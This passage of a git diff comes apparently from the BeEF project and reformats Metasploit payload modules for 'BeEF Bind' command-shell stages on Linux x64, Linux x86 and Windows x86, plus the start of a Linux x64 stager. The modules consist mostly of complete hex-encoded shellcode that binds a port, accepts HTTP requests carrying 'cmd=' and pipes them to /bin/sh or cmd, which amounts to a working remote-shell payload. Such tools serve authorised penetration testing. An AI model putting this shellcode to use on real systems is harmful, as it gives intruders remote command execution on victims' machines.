'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 165, 'n' ]
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
"\xf6\x48\x31\xd2\x0f\x05"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

135
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
View File

@@ -10,75 +10,72 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [168, 'n']
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" \
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" \
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" \
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" \
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" \
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" \
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" \
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" \
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" \
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" \
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" \
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" \
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" \
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" \
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" \
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" \
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" \
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" \
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" \
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" \
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" \
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" \
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" \
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" \
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" \
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" \
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" \
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" \
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" \
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" \
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" \
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" \
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" \
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" \
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" \
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" \
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 168, 'n' ]
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

225
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
View File

@@ -2,7 +2,6 @@
# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -15,123 +14,113 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [511, 'n']
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" \
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" \
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" \
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" \
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" \
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" \
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" \
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" \
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" \
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" \
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" \
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" \
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" \
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" \
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" \
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" \
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" \
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" \
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" \
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" \
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" \
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" \
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" \
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" \
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" \
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" \
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" \
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" \
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" \
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" \
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" \
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" \
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" \
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" \
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" \
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" \
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" \
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" \
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" \
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" \
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" \
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" \
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" \
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" \
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" \
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" \
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" \
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" \
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" \
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" \
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" \
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" \
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" \
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" \
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" \
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" \
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" \
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" \
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" \
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" \
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" \
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" \
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" \
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" \
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" \
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" \
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" \
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" \
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" \
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" \
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" \
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" \
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" \
"\xff\xd5\xe9\x58\xfe\xff\xff"
}))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Ty Miller' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 511, 'n' ]
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
"\xff\xd5\xe9\x58\xfe\xff\xff"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

67
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x64.rb
View File

@@ -5,45 +5,40 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module MetasploitModule
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 54, 'n' ] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
